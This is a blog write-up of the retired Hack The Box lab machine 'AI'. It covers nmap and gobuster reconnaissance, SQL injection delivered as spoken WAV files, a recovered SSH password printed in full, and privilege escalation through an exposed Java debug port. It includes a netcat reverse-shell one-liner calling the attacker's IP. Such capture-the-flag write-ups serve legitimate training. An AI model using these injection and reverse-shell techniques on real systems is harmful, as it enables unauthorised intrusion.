Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
AI
| Name: | AI 
|
|---|---|
| Release Date: | 09 Nov 2019 |
| Retire Date: | 25 Jan 2020 |
| OS: | Linux |
| Base Points: | Medium - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
imth  00 days, 00 hours, 56 mins, 36 seconds |
 |
goeo  00 days, 02 hours, 30 mins, 37 seconds |
| Creator: | MrR3boot  |
| CherryTree File: | CherryTree - Remove the .txt extension |
We start box with the usual nmap -sC -sV -Pn -p- -oA ./AI 10.10.10.163
$ nmap -sC -sV -Pn -p- -oA ./AI 10.10.10.163
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 03:27 EDT
Nmap scan report for 10.10.10.163
Host is up (0.095s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5744.35 seconds
It appears that we have only SSH and HTTP running on their usual ports. Let's check the HTTP page and fire up gobuster while we look around manually.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.163/ -x php
To make matters more confusing, when you hover over that AI icon and select AI, you're asked to process a WAV file to make a query. Unless it's trying to use voice recog or some kind of stego, that's a new one on me.
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.163/ -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.163/
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/09/06 03:38:42 Starting gobuster
===============================================================
/images (Status: 301)
/index.php (Status: 200)
/contact.php (Status: 200)
/about.php (Status: 200)
/uploads (Status: 301)
/db.php (Status: 200)
/intelligence.php (Status: 200)
/ai.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/09/06 13:00:06 Finished
===============================================================
Now we have some places to check. Checking out "intelligence.php" gives us a VERY useful table.
Amazingly, I was not too far off with the voice recognition comment. The page mentions that it is using the Male-US voice model with Microsoft, so after digging around MS's site for about an hour, I finally find this article. I just need to figure out how to get my text into a wav format. Well funny enough, there is a text2wave component of the festival package. Let's play around with it.
$ sudo apt-get install festival -y
$ echo "Is this thing on question mark" | text2wave -o test.wav
If you play the wave file, it says EXACTLY what is echo'ed. So it actually says question mark. I wonder how that's going to play with the query punctuation, but I suspect that's where the "AI" portion comes in. Let's try it out on the users tables with both username and password.
$ echo "open single, quote, join, select, username from users, pound sign" | text2wave -o username.wav
$ echo "open single, quote, join, select, password from users, pound sign" | text2wave -o password.wav
and then upload those wav files to the AI page. Below are screenshots of the results.
Well hello there alexa! It looks like we have some creds. alexa:H,Sq9t6}a<)?q93_ which will let us SSH into the box. Time to run LinEnum.sh and find our way to PrivEsc. As always, the LinEnum output is in the CTB file. Around line 743 (trust me, this crap gets boring to read, but has the possibility of saving you DAYS of work trying to find it manually without the script), we find a nice section of Java Debug Wire Protocal information.
root 24722 18.5 5.5 3137572 110584 ? Sl 17:24 0:04 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
That's straight from the CTB. So, JDWP is running on localhost:8000. I'm not great at Java debugging, but I know someone who is (Thanks again Raiden99!). The Java Debugger is hugely disappointing, especially since none of the alternative to Oracle Jave have it, and we can't connect to port 8000 and can't install it on the Target. A quick Google search brings us to https://github.com/IOActive/jdwp-shellifier and with this we should be able to get a root shell. So, create your usual nc reverse shell script:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f
and move it and the shellifier.py script to the TARGET box. Set up 2 nc listeners. One on your machine, and the other to 8005 on the Target. Then, execute the shellifier. Boom goes the dynamite and you're a rooted box.
That's all, folks!
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.